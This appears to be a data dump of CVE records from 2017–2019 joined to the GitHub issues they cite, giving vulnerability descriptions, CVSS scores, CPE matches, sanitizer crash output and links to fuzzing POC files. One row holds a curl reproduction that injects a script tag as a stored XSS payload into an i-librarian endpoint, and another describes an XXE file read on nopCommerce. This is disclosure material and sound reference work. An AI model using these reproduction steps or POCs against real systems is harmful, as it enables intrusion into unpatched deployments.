},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gith... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:i-librarian:i\\,_librarian:4.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C1942913-38F2-41F7-80F9-887EE83FC680",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionS... | [
"79"
] | 79 | https://github.com/mkucej/i-librarian/issues/140 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"mkucej",
"i-librarian"
] | ## Summary
The parameter `$notes` is not sanitized after querying from database, so attackers can create a stored XSS attack.
## How to reproduce
1. `curl http://<domain.tld>/notes.php --data 'file=1¬es=<script>alert(1)</script>' --cookie 'PHPSESSID=<session_id>'`
2. in your browser, access `http://<domain.tld... | Stored XSS in notes.php | https://api.github.com/repos/mkucej/i-librarian/issues/140/comments | 2 | 2019-04-18T15:18:33Z | 2019-04-20T17:14:16Z | https://github.com/mkucej/i-librarian/issues/140 | 434,824,908 | 140 | 339 |
CVE-2019-11243 | 2019-04-22T15:29:00.790 | In Kubernetes v1.12.0-v1.12.4 and v1.13.0, the rest.AnonymousClientConfig() method returns a copy of the provided config, with credentials removed (bearer token, username/password, and client certificate/key data). In the affected versions, rest.AnonymousClientConfig() did not effectively clear service account credenti... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL... | [
{
"source": "jordan@liggitt.net",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/108053"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/kubernetes/kubernetes/issues/7... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DA1909D3-D45E-4AD4-B773-51ADCFC63113",
"versionEndExcluding": null,
"versionEndIncluding": "1.12.4",
"versionStart... | [
"212"
] | 212 | https://github.com/kubernetes/kubernetes/issues/76797 | [
"Third Party Advisory"
] | github.com | [
"kubernetes",
"kubernetes"
] | CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N
The `rest.AnonymousClientConfig()` method returns a copy of the provided config, with credentials removed (bearer token, username/password, and client certificate/key data).
In the following versions, `rest.AnonymousClientConfig()` did not effectively clear service acc... | CVE-2019-11243: v1.12.0-v1.12.4, v1.13.0: rest.AnonymousClientConfig() does not remove the serviceaccount credentials from config created by rest.InClusterConfig() | https://api.github.com/repos/kubernetes/kubernetes/issues/76797/comments | 2 | 2019-04-18T21:31:53Z | 2022-05-16T21:59:22Z | https://github.com/kubernetes/kubernetes/issues/76797 | 434,967,981 | 76,797 | 340 |
CVE-2019-11244 | 2019-04-22T15:29:00.837 | In Kubernetes v1.8.x-v1.14.x, schema info is cached by kubectl in the location specified by --cache-dir (defaulting to $HOME/.kube/http-cache), written with world-writeable permissions (rw-rw-rw-). If --cache-dir is specified and pointed at a different location accessible to other users/groups, the written files may be... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 1.9,
"confidentialityImpact": "NONE",
... | [
{
"source": "jordan@liggitt.net",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/108064"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3942"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A57F3AC4-5E09-4C16-91A7-80D54F8F968C",
"versionEndExcluding": null,
"versionEndIncluding": "1.14.1",
"versionStart... | [
"732"
] | 732 | https://github.com/kubernetes/kubernetes/issues/76676 | [
"Third Party Advisory"
] | github.com | [
"kubernetes",
"kubernetes"
] | In kubectl v1.8.0+, schema info is cached in the location specified by `--cache-dir` (defaulting to `$HOME/.kube/http-cache`), written with world-writeable permissions (rw-rw-rw-).
If `--cache-dir` is specified and pointed at a different location accessible to other users/groups, the written files may be modified by... | CVE-2019-11244: `kubectl --http-cache=<world-accessible dir>` creates world-writeable cached schema files | https://api.github.com/repos/kubernetes/kubernetes/issues/76676/comments | 12 | 2019-04-16T20:14:25Z | 2022-10-14T02:06:00Z | https://github.com/kubernetes/kubernetes/issues/76676 | 433,964,918 | 76,676 | 341 |
CVE-2019-11463 | 2019-04-23T03:29:00.353 | A memory leak in archive_read_format_zip_cleanup in archive_read_support_format_zip.c in libarchive 3.3.4-dev allows remote attackers to cause a denial of service via a crafted ZIP file because of a HAVE_LZMA_H typo. NOTE: this only affects users who downloaded the development code from GitHub. Users of the product's o... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libarchive/libarchive/commit/ba641f73f3d758d9032b3f0e5597a9c6e593a505"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url"... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libarchive:libarchive:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CD8C4D61-FC17-4094-8516-F9DB094DEB8B",
"versionEndExcluding": "3.4.0",
"versionEndIncluding": null,
"versionStartE... | [
"401"
] | 401 | https://github.com/libarchive/libarchive/issues/1165 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"libarchive",
"libarchive"
] | I've encountered a memory leak while fuzzing libarchive. A 32-byte reproducer input is attached:
[input.zip](https://github.com/libarchive/libarchive/files/3019394/input.zip). Do not extract this zip file -- it is the fuzzed input itself.
To reproduce, build latest libarchive with ASAN (`clang -fsanitize=address`) ... | Memory leak when decoding LZMA | https://api.github.com/repos/libarchive/libarchive/issues/1165/comments | 6 | 2019-03-28T17:41:33Z | 2019-04-23T22:39:28Z | https://github.com/libarchive/libarchive/issues/1165 | 426,625,285 | 1,165 | 342 |
CVE-2018-20819 | 2019-04-23T14:29:00.320 | io/ZlibCompression.cc in the decompression component in Dropbox Lepton 1.2.1 allows attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact by crafting a jpg image file. The root cause is a missing check of header payloads that may be (incorrec... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/dropbox/lepton/issues/112"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dropbox:lepton:1.2.1:*:*:*:*:*:*:*",
"matchCriteriaId": "6DCDBF54-A4B3-4D67-A014-6ECC38D58621",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | [
"787"
] | 787 | https://github.com/dropbox/lepton/issues/112 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"dropbox",
"lepton"
] | POCs:
https://github.com/ntu-sec/pocs/blob/master/lepton-3f6d98c/crashes/hbo_inflate.c:1170_1.lep?raw=true
https://github.com/ntu-sec/pocs/blob/master/lepton-3f6d98c/crashes/hbo_inflate.c:1170_2.lep?raw=true
ASAN output (`lepton -unjailed $POC /tmp/test.jpg`):
```
lepton v1.0-1.2.1-171-g3f6d98c
START ACHIEVED 1... | AddressSanitizer: heap-buffer-overflow at inflate.c:1170 | https://api.github.com/repos/dropbox/lepton/issues/112/comments | 1 | 2018-07-17T02:42:05Z | 2019-04-09T23:26:40Z | https://github.com/dropbox/lepton/issues/112 | 341,745,151 | 112 | 343 |
CVE-2018-20820 | 2019-04-23T14:29:00.367 | read_ujpg in jpgcoder.cc in Dropbox Lepton 1.2.1 allows attackers to cause a denial-of-service (application runtime crash because of an integer overflow) via a crafted file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/dropbox/lepton/commit/6a5ceefac1162783fffd9506a3de39c85c725761"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dropbox:lepton:1.2.1:*:*:*:*:*:*:*",
"matchCriteriaId": "6DCDBF54-A4B3-4D67-A014-6ECC38D58621",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | [
"190"
] | 190 | https://github.com/dropbox/lepton/issues/111 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"dropbox",
"lepton"
] | We found with our fuzzer an interger overflow error inside `read_ujpg` from jpgcoder.cc when feeding lepton 3f6d98c with a crafted lep file.
POC:
https://github.com/ntu-sec/pocs/blob/master/lepton-3f6d98c/crashes/iof_jpgcoder.cc:4160_1.lep?raw=true
When running `lepton -unjailed $POC /tmp/test.jpg`, it output th... | Integer Overflow at src/lepton/jpgcoder.cc:4160 | https://api.github.com/repos/dropbox/lepton/issues/111/comments | 0 | 2018-07-17T02:38:50Z | 2019-04-09T23:32:45Z | https://github.com/dropbox/lepton/issues/111 | 341,744,551 | 111 | 344 |
CVE-2018-20821 | 2019-04-23T14:29:00.460 | The parsing component in LibSass through 3.5.5 allows attackers to cause a denial-of-service (uncontrolled recursion in Sass::Parser::parse_css_variable_value in parser.cpp). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00047.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sass-lang:libsass:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7377DD2D-250C-48D1-92F9-55C557967804",
"versionEndExcluding": null,
"versionEndIncluding": "3.5.5",
"versionStartExclu... | [
"674"
] | 674 | https://github.com/sass/libsass/issues/2658 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"sass",
"libsass"
] | We found with our fuzzer some stack over flow errors when constructing `String_Schema_Obj` at Line 1808 in parser.cpp (45f50873962b7d1c66bd115ba6e644bdaaf6cac1) when compiled with Address Sanitizer (using sassc as the driver).
```
ASAN:SIGSEGV
=================================================================
==17... | AddressSanitizer: stack-overflow when creating String_Schema_Obj (parser.cpp:1808) | https://api.github.com/repos/sass/libsass/issues/2658/comments | 4 | 2018-06-02T07:13:45Z | 2019-06-05T05:35:48Z | https://github.com/sass/libsass/issues/2658 | 328,721,390 | 2,658 | 345 |
CVE-2018-20822 | 2019-04-23T14:29:00.540 | LibSass 3.5.4 allows attackers to cause a denial-of-service (uncontrolled recursion in Sass::Complex_Selector::perform in ast.hpp and Sass::Inspect::operator in inspect.cpp). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00047.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sass-lang:libsass:3.5.4:*:*:*:*:*:*:*",
"matchCriteriaId": "808EA44D-5943-4834-93C2-44D82A5FAADE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | [
"674"
] | 674 | https://github.com/sass/libsass/issues/2671 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"sass",
"libsass"
] | We found with our fuzzer some stack over flow errors at Sass::Inspect::operator() (inspect.cpp:977)(45f50873962b7d1c66bd115ba6e644bdaaf6cac1) when compiled with Address Sanitizer (using sassc as the driver).
```
=================================================================
==2828==ERROR: AddressSanitizer: stac... | AddressSanitizer: stack-overflow at Sass::Inspect::operator() (inspect.cpp:977) | https://api.github.com/repos/sass/libsass/issues/2671/comments | 4 | 2018-06-03T04:54:21Z | 2022-10-10T07:16:59Z | https://github.com/sass/libsass/issues/2671 | 328,799,468 | 2,671 | 346 |
CVE-2019-11470 | 2019-04-23T14:29:00.600 | The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs because ReadCINImage in coders/cin.c lacks a check for insufficient image data in a file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 7.1,
"confidentialityImpact": "NONE"... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00057.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00001.html"
},
{
"source": "cve@mit... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-26:q16:*:*:*:*:*:*",
"matchCriteriaId": "64AB3C42-4698-4E94-9A4A-F75BA34C7213",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versi... | [
"400"
] | 400 | https://github.com/ImageMagick/ImageMagick/issues/1472 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to... | Incorrect parsing Cineon causing `convert` to take ridiculous time | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1472/comments | 7 | 2019-02-05T04:29:35Z | 2019-04-23T16:45:43Z | https://github.com/ImageMagick/ImageMagick/issues/1472 | 406,625,350 | 1,472 | 347 |
CVE-2019-11471 | 2019-04-23T14:29:00.697 | libheif 1.4.0 has a use-after-free in heif::HeifContext::Image::set_alpha_channel in heif_context.h because heif_context.cc mishandles references to non-existing alpha images. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/strukturag/libheif/commit/995a4283d8ed2d0d2c1ceb1a577b993df2f0e014"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libheif:1.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6F0C81ED-3820-41B5-8DB0-36E2BC6D993C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclu... | [
"416"
] | 416 | https://github.com/strukturag/libheif/issues/123 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"strukturag",
"libheif"
] | As of dcbfa77, `./heif-convert $FILE /tmp/test.png` may report a heap-use-after-free error when libheif is compiled with AddressSanitizer.
```
==16294==ERROR: AddressSanitizer: heap-use-after-free on address 0x6030000004a0 at pc 0x7ffff78fe3f6 bp 0x7fffffff89a0 sp 0x7fffffff8998
WRITE of size 8 at 0x6030000004a0 t... | AddressSanitizer: heap-use-after-free at heif_context.h:117 | https://api.github.com/repos/strukturag/libheif/issues/123/comments | 2 | 2019-04-14T12:30:34Z | 2019-04-28T12:52:59Z | https://github.com/strukturag/libheif/issues/123 | 432,969,471 | 123 | 348 |
CVE-2019-11472 | 2019-04-23T14:29:00.837 | ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00057.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00001.html"
},
{
"source": "cve@mit... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-41:q16:*:*:*:*:*:*",
"matchCriteriaId": "34C2A939-19C7-4BC0-8DE5-E3D612C99B0E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versi... | [
"369"
] | 369 | https://github.com/ImageMagick/ImageMagick/issues/1546 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to... | FPE errors when reading XWD images | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1546/comments | 2 | 2019-04-14T07:21:12Z | 2019-04-24T01:24:42Z | https://github.com/ImageMagick/ImageMagick/issues/1546 | 432,941,385 | 1,546 | 349 |
CVE-2019-11490 | 2019-04-24T03:29:00.267 | An issue was discovered in Npcap 0.992. Sending a malformed .pcap file with the loopback adapter using either pcap_sendqueue_queue() or pcap_sendqueue_transmit() results in kernel pool corruption. This could lead to arbitrary code executing inside the Windows kernel and allow escalation of privileges. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nmap/nmap/issues/1568"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nmap:npcap:0.992:*:*:*:*:*:*:*",
"matchCriteriaId": "D9F2D880-CB47-4041-9526-2BB17DF1FDD8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding":... | [
"415"
] | 415 | https://github.com/nmap/nmap/issues/1568 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"nmap",
"nmap"
] | #### Description:
Sending a malformed .pcap with npcap loopback adapter causes kernel pool corruption.
#### Analysis:
When sending a malformed .pcap file with the npcap loopback adapter using either `pcap_sendqueue_queue()` or `pcap_sendqueue_transmit()` results in kernel pool corruption. This vulnerability co... | Npcap 0.992 Pool Corruption | https://api.github.com/repos/nmap/npcap/issues/308/comments | 4 | 2019-04-22T20:48:04Z | 2021-05-01T18:18:38Z | https://github.com/nmap/npcap/issues/308 | 873,737,308 | 308 | 350 |
CVE-2019-11498 | 2019-04-24T05:29:00.783 | WavpackSetConfiguration64 in pack_utils.c in libwavpack.a in WavPack through 5.1.0 has a "Conditional jump or move depends on uninitialised value" condition, which might allow attackers to cause a denial of service (application crash) via a DFF file that lacks valid sample-rate data. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/dbry/WavPack/commit/bc6cba3f552c44565f7f1e66dc1580189addb2b4"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:wavpack:wavpack:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A5AF1FF6-17E5-429C-8280-8215E7010571",
"versionEndExcluding": null,
"versionEndIncluding": "5.1.0",
"versionStartExcludi... | [
"824"
] | 824 | https://github.com/dbry/WavPack/issues/67 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"dbry",
"WavPack"
] | [uninit-config.wav.zip](https://github.com/dbry/WavPack/files/2927927/uninit-config.wav.zip) - contains fuzzed input
The parsing of the attached file uninit-config.wav leads to a read of an uninitialized location in memory. The uninitialized read can be uncovered using a tool such as [Valgrind](http://valgrind.org/)... | Uninitialized Read in WavpackSetConfiguration64() | https://api.github.com/repos/dbry/WavPack/issues/67/comments | 1 | 2019-03-04T19:43:54Z | 2019-03-06T20:05:47Z | https://github.com/dbry/WavPack/issues/67 | 416,962,329 | 67 | 351 |
CVE-2018-13443 | 2019-04-24T15:29:00.277 | EOS.IO jit-wasm 4.1 has a heap-based buffer overflow via a crafted wast file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/EOSIO/eos"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/EOSIO/eos/issues/6585"
},
{
"source": "cve@mi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:block:jit-wasm:4.1:*:*:*:*:*:*:*",
"matchCriteriaId": "8039FA2E-5958-475B-9448-D0653C07C05F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding... | [
"787"
] | 787 | https://github.com/EOSIO/eos/issues/6585 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"EOSIO",
"eos"
] | This bug is already reported at hackerone and has been solved
It's just public here.
Vendor:eosio
Affected product:libraries/wasm-jit
Product Version: 4.1
Git commit hash:29799eae7bb919e480981e6abf110dfa75198f8d
**Summary:**
A heap overflow in the jit-wasm which could lead to code execution. In function WA... | A heap-buffer-overflow vunnerability of wasm | https://api.github.com/repos/EOSIO/eos/issues/6585/comments | 3 | 2019-01-11T09:03:58Z | 2019-04-28T14:16:27Z | https://github.com/EOSIO/eos/issues/6585 | 398,193,353 | 6,585 | 352 |
CVE-2017-18367 | 2019-04-24T21:29:00.243 | libseccomp-golang 0.9.0 and earlier incorrectly generates BPFs that OR multiple arguments rather than ANDing them. A process running under a restrictive seccomp filter that specified multiple syscall arguments could bypass intended access restrictions by specifying a single matching argument. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Patch",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2019/04/25/6"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://access.redhat.com/errata/RHSA-2019:4087"
},
{... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libseccomp-golang_project:libseccomp-golang:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6BE659D4-728B-49ED-878F-D0F43E9C2B31",
"versionEndExcluding": null,
"versionEndIncluding": "0.9.0",
... | [
"20"
] | 20 | https://github.com/seccomp/libseccomp-golang/issues/22 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"seccomp",
"libseccomp-golang"
] | Issue originally identified at https://github.com/moby/moby/issues/32714
Presently, when adding a rule with multiple syscall arguments, we add each argument separately with a separate call to `seccomp_rule_add_array` and a single syscall specified. This produces an OR relationship between the arguments - IE, we will... | BUG: Handling of multiple syscall arguments incorrect (CVE-2017-18367) | https://api.github.com/repos/seccomp/libseccomp-golang/issues/22/comments | 8 | 2017-04-19T19:56:01Z | 2019-04-25T17:21:14Z | https://github.com/seccomp/libseccomp-golang/issues/22 | 222,852,855 | 22 | 353 |
CVE-2019-11519 | 2019-04-25T13:29:00.407 | Libraries/Nop.Services/Localization/LocalizationService.cs in nopCommerce through 4.10 allows XXE via the "Configurations -> Languages -> Edit Language -> Import Resources -> Upload XML file" screen. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nopSolutions/nopCommerce/issues/3713"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nopcommerce:nopcommerce:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AEDDBB73-82A4-4779-8221-396DE3C11935",
"versionEndExcluding": null,
"versionEndIncluding": "4.10",
"versionStart... | [
"611"
] | 611 | https://github.com/nopSolutions/nopCommerce/issues/3713 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"nopSolutions",
"nopCommerce"
] | I believe I have found a zero day which allows an attacker to read files of the server by uploading a XML file in the following:
Configurations -> Languages -> Edit Language -> Import Resources -> Upload XML file to perform XXE attack and read files of the server.
I used Burp Collaborator to read the files and it... | XXE processing | https://api.github.com/repos/nopSolutions/nopCommerce/issues/3713/comments | 2 | 2019-04-24T03:05:15Z | 2023-12-04T04:53:29Z | https://github.com/nopSolutions/nopCommerce/issues/3713 | 436,475,348 | 3,713 | 354 |
CVE-2019-9900 | 2019-04-25T15:29:01.497 | When parsing HTTP/1.x header values, Envoy 1.9.0 and before does not reject embedded zero characters (NUL, ASCII 0x0). This allows remote attackers crafting header values containing embedded NUL characters to potentially bypass header matching rules, gaining access to unauthorized resources. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:0741"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/envoyproxy... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BF47B6A7-F357-4074-B90D-8BEB0AB53DC0",
"versionEndExcluding": null,
"versionEndIncluding": "1.9.0",
"versionStartExclud... | [
"74"
] | 74 | https://github.com/envoyproxy/envoy/issues/6434 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"envoyproxy",
"envoy"
] | See https://github.com/envoyproxy/envoy/security/advisories/GHSA-x74r-f4mw-c32h | CVE-2019-9900 | https://api.github.com/repos/envoyproxy/envoy/issues/6434/comments | 2 | 2019-03-29T17:02:25Z | 2019-11-08T18:11:49Z | https://github.com/envoyproxy/envoy/issues/6434 | 427,086,406 | 6,434 | 355 |
